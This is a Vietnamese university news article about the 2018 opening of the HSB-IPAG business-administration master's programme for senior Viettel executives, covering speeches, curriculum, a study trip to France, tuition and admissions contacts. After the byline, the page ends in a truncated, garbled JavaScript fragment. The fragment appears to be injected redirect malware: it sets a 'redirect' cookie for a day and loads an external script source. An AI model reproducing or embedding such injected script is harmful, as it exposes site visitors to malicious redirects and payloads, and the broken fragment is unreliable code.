Khai giảng Chương trình Thạc sĩ Khoa học Quản trị Kinh doanh dành cho cán bộ cấp cao của Tập đoàn Viettel

HSB-Viettel-7Các học viên của Chương trình là thế hệ cán bộ cấp cao mới kỷ nguyên 4.0, đại diện cho khối nghiên cứu sản xuất của Tập đoàn Viettel.

Sáng 30/9/2018, Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN đã tổ chức lễ Khai giảng Chương trình đào tạo Thạc sĩ Khoa học Quản trị kinh doanh (HSB – IPAG) dành cho cán bộ quản lý cấp cao khối nghiên cứu và sản xuất của Tập đoàn Công nghiệp – Viễn thông Quân đội (Viettel).

Phát biểu tại buổi lễ, PGS.TS Hoàng Đình Phi cho biết: “Khoa Quản trị và kinh doanh với sứ mệnh đào tạo các nhà lãnh đạo, quản trị, điều hành chuyên nghiệp tại Việt Nam và quốc tế, đã thiết kế chương trình đặc biệt dành riêng cho đối tượng là lãnh đạo cấp cao của Tập đoàn Viettel, với kỳ vọng góp phần cùng Viettel đào tạo và nuôi dưỡng nguồn nhân sự chất lượng cao cho sự phát triển bền vững của Tập đoàn. Theo đó, học viên không chỉ được tiếp cận với những tinh hoa của khoa học quản trị, điều hành mà còn được giao lưu, chia sẻ tri thức, kỹ năng, các mối quan hệ trong mạng lưới học viên và 13.000 cựu học viên của HSB. Đó là những giá trị nhân văn mà HSB mong muốn được mang lại cho các học viên trong hai năm học tập và gắn bó với nhà trường.”

Theo đó, chương trình HSB-IPAG bao gồm 11 học phần và Luận văn tốt nghiệp, trong đó có 07 học phần do các giảng viên cao cấp của HSB giảng dạy, 04 học phần do Giảng viên nước ngoài đến từ Trường IPAG hướng dẫn và chia sẻ. Phần Luận văn được thực hiện trong vòng 6 tháng nghiên cứu và hướng dẫn với các giảng viên của HSB – IPAG và được bảo vệ trước Hội đồng đánh giá riêng.

Trong khung chương trình, học viên sẽ có 1 học phần được học tập tại Cộng hòa Pháp với thời gian 2 tuần. Tại đây, học viên không chỉ được tiếp cận với các tri thức tiên tiến của châu Âu và thế giới, trải nghiệm phong cách dạy và học hiện đại của các chuyên gia, giáo sư hàng đầu của Pháp, mà còn được tham quan các mô hình doanh nghiệp nổi bật. Các giảng viên cấp cao của IPAG sẽ tham gia giảng dạy như: GS.TS.Nguyễn Đức Khương – Thành viên Tổ tư vấn kinh tế của Thủ tướng Chính phủ, Trưởng khoa Tài chính – trường Kinh doanh IPAG, Giám đốc chương trình HSB – IPAG, GS. Patrick Legland – giảng viên cấp cao của IPAG và châu Âu. Ngoài ra, các anh chị học viên sẽ được tham quan và giao lưu văn hóa tại các quốc gia châu Âu, như: Pháp, Italia, Thụy Sĩ, Đức, Monaco, Vatican… Sự thành công của các chương trình học tập và giao lưu văn hóa tại châu Âu được đánh giá là một trong những giá trị to lớn và khác biệt mà chương trình HSB-IPAG dành cho học viên.

HSB-Viettel-1

 PGS.TS Hoàng Đình Phi kỳ vọng Chương trình HSB-IPAG góp phần cùng Viettel đào tạo nguồn nhân sự chất lượng cao cho sự phát triển bền vững của Viettel

Ông Nguyễn Đình Chiến – Phó Tổng giám đốc Tập đoàn Công nghiệp – Viễn thông Quân đội, đại diện 24 học viên của khóa học trân trọng cảm hơn Khoa Quản trị và Kinh doanh – ĐHQGHN đã phối hợp với Học viện Viettel để kiến tạo nên một chương trình giàu giá trị học thuật và thực tiễn, đáp ứng nhu cầu học tập không ngừng nghỉ của cán bộ Tập đoàn.

Ông Chiến cho biết: “Các học viên của Chương trình Thạc sĩ Khoa học Quản trị Kinh doanh hôm nay là thế hệ cán bộ cấp cao mới kỷ nguyên 4.0, đại diện cho khối nghiên cứu sản xuất của Tập đoàn Viettel. Hầu hết nhân sự tham gia khóa học đều đã học tập các chương trình thạc sĩ, tiến sĩ ở Nga, Pháp, Mỹ, Anh, Nhật Bản, Autralia, Trung Quốc, Hàn Quốc…và đang giữ vị trí quan trọng trong các đơn vị của Viettel. Để đáp ứng nhu cầu phát triển mới, Tập đoàn đầu tư thời gian, tài chính để khối nhân sự này được tham gia học tập bài bản, nghiêm túc tri thức quản trị kinh doanh tại HSB. Mô hình lớp học chương trình Thạc sĩ Khoa học Quản trị của HSB sẽ được nhân rộng cho cán bộ cấp trung của khối Nghiên cứu sản xuất nói riêng và nhân sự toàn Tập đoàn nói chung.”

Ông Nguyễn Đình Chiến cũng nhắn nhủ các anh chị học viên của khóa học cần quyết tâm và tập trung cao độ nhất cho việc học tập Chương trình Thạc sĩ tại HSB do sự yêu cầu cao của các giảng viên hàng đầu Việt Nam và quốc tế cũng nhu yêu cầu chung của cả Chương trình.

HSB-Viettel-4

Ông Nguyễn Đình Chiến – Phó Tổng giám đốc Tập đoàn Công nghiệp – Viễn thông Quân đội trân trọng cảm hơn Khoa Quản trị và Kinh doanh đã kiến tạo nên một chương trình giàu giá trị học thuật và thực tiễn

Các học viên, giảng viên của chương trình đã có buổi trao đổi thân mật tại bàn trà của Khoa Quản trị và Kinh doanh. Hầu hết đều cảm nhận và ấn tượng về sự tương đồng trong văn hóa của HSB và Viettel như mục tiêu phát triển bền vững, tư duy đổi mới, sáng tạo và tác phong làm việc chuyên nghiệp của nhân sự. Đây cũng chính là bản sắc văn hóa riêng làm nên sự thành công của hai đơn vị, mở ra nhiều cơ hội hợp tác trong tương lai.

HSB-Viettel-2

Ông Bùi Quang Tuyến – Giám đốc Học viện Viettel phát biểu tại Lễ khai giảng

Hợp đồng Hợp tác đào tạo chương trình Thạc sĩ Khoa học Quản trị kinh doanh dành cho cán bộ quản lý cấp cao của Tập đoàn Công nghiệp – Viễn thông Quân đội với Khoa Quản trị và Kinh doanh – ĐHQGHN được thực hiện qua nhiều phiên làm việc, trao đổi giữa lãnh đạo hai đơn vị. Mục tiêu của Chương trình nhằm nâng cao năng lực lãnh đạo, trang bị cho đội ngũ cán bộ quản lý những kiến thức, kỹ năng về quản trị, điều hành, giúp xây dựng đội ngũ cán bộ toàn diện 3 trong 1 (lãnh đạo, quản lý và chuyên gia), đáp ứng nhu cầu phát triển nhanh, bền vững của Tập đoàn Viettel trong kỷ nguyên mới.

Trước đó, Tập đoàn Công nghiệp – Viễn thông Quân đội đã hợp tác cùng Khoa Quản trị và Kinh doanh tổ chức nhiều khóa đào tạo dành cho cán bộ nguồn, cán bộ quản lý của Tập đoàn, như: Đào tạo kỹ năng dành cho cán bộ nguồn; Nâng cao năng lực quản lý cấp trung; Chương trình đào tạo về công tác quản trị nhân sự dành cho cán bộ chuyên trách…Nhiều lãnh đạo, chuyên viên của Viettel cũng đang là học viên các chương trình thạc sĩ quản trị kinh doanh khác của HSB.

HSB-Viettel-5

HSB-Viettel-6

Giảng viên và học viên của Chương trình chụp ảnh lưu niệm tại sảnh của HSB

Chương trình đào tạo Thạc sĩ Khoa học Quản trị Kinh doanh HSB-IPAG là chương trình hợp tác đào tạo giữa Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN với trường Kinh doanh IPAG – Cộng hòa Pháp từ năm 2014. Theo kết quả mới nhất của bảng xếp hạng danh tiếng Shanghai ranking, trường Kinh doanh IPAG đứng ở Top 300 trường Kinh tế tốt nhất toàn cầu. Thứ hạng của IPAG đang cao hơn RMIT University của Australia, Osaka University và Kyoto của Nhật. Đây là ghi nhận của các nhà khoa học cũng như các học viên dành cho các chương trình đào tạo xuất sắc của IPAG trong suốt những năm qua, trong đó có chương trình hợp tác với HSB.

Một số ưu điểm nổi bật của chương trình HSB-IPAG:

– Chương trình được ĐHQGHN cấp phép và được Bộ Giáo dục và Đào tạo Việt Nam và Bộ Giáo dục quốc gia, Giảng dạy đại học và nghiên cứu nước Cộng hòa Pháp công nhận văn bằng;

 

– Hình thức xét tuyển linh hoạt, hiện đại; Xét duyệt hồ sơ và phỏng vấn trực tiếp do giảng viên của HSB và Trường Kinh doanh IPAG để kiểm tra kinh nghiệm làm việc, động cơ học tập và trình độ tiếng Anh.

– Nội dung đào tạo liên ngành có tính ứng dụng cao;

– Đội ngũ giảng viên xuất sắc trình độ quốc tế được lựa chọn từ Trường Kinh doanh IPAG, HSB và ĐHQGHN;

– Môi trường học tập sáng tạo, thân thiện, cơ sở vật chất hiện đại, kho dữ liệu tham khảo phong phú trên thư viện trực tuyến của IPAG;

– Cơ hội phát triển các mối quan hệ trong cộng đồng cựu học viên HSB và IPAG trên toàn thế giới; Cơ hội du học, học tiếp lên Tiến sĩ tại Việt Nam, Pháp và các nước trên thế giới.

Học phí & học bổng của chương trình:

– Học phí của toàn bộ chương trình là 148.000.000.VND/ khóa học 18 – 22 tháng (Bằng chữ: Một trăm bốn mươi tám triệu đồng);

– Học viên có kết quả kiểm tra đầu vào và kết quả học tập toàn khóa xuất sắc có cơ hội được nhận Học bổng vào cuối khóa;

– Học phí đã bao gồm toàn bộ chi phí đào tạo, hội thảo học tập, tham quan thực tế; chi phí cơ sở vật chất, phòng học, tài liệu; chi phí quản lý, dịch vụ teabreak…;

– Học viên được tham quan học tập tại Pháp trong thời gian 2 tuần.

Để tìm hiểu thêm thông tin về chương trình đào tạo Thạc sĩ Khoa học Quản trị Kinh doanh HSB-IPAG, vui lòng liên hệ:

Phòng Tuyển sinh – Khoa Quản trị và Kinh doanh (HSB), Đại học Quốc gia Hà Nội

Địa chỉ: Tầng 2, nhà B1, số 144 Xuân Thuỷ, Cầu Giấy, Hà Nội

Hotline: 0968.20.22.44 – 024.3754 8456 (máy lẻ 232)

Email: ipag.hsb@hsb.edu.vn

Website: http://hsb.vnu.edu.vn/

Dưới đây là một số hình ảnh trong Lễ khai giảng Chương trình Thạc sĩ Khoa học Quản trị kinh doanh HSB –  IPAG dành cho cán bộ quản lý của Tập đoàn Công nghiệp – Viễn thông Quân đội tổ chức tại HSB:

HSB-Viettel-7

 HSB-Viettel-8

HSB-Viettel-9

HSB-Viettel-10

HSB-Viettel-11

HSB-Viettel-12

HSB-Viettel-13

HSB-Viettel-14-

Thùy Dung

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’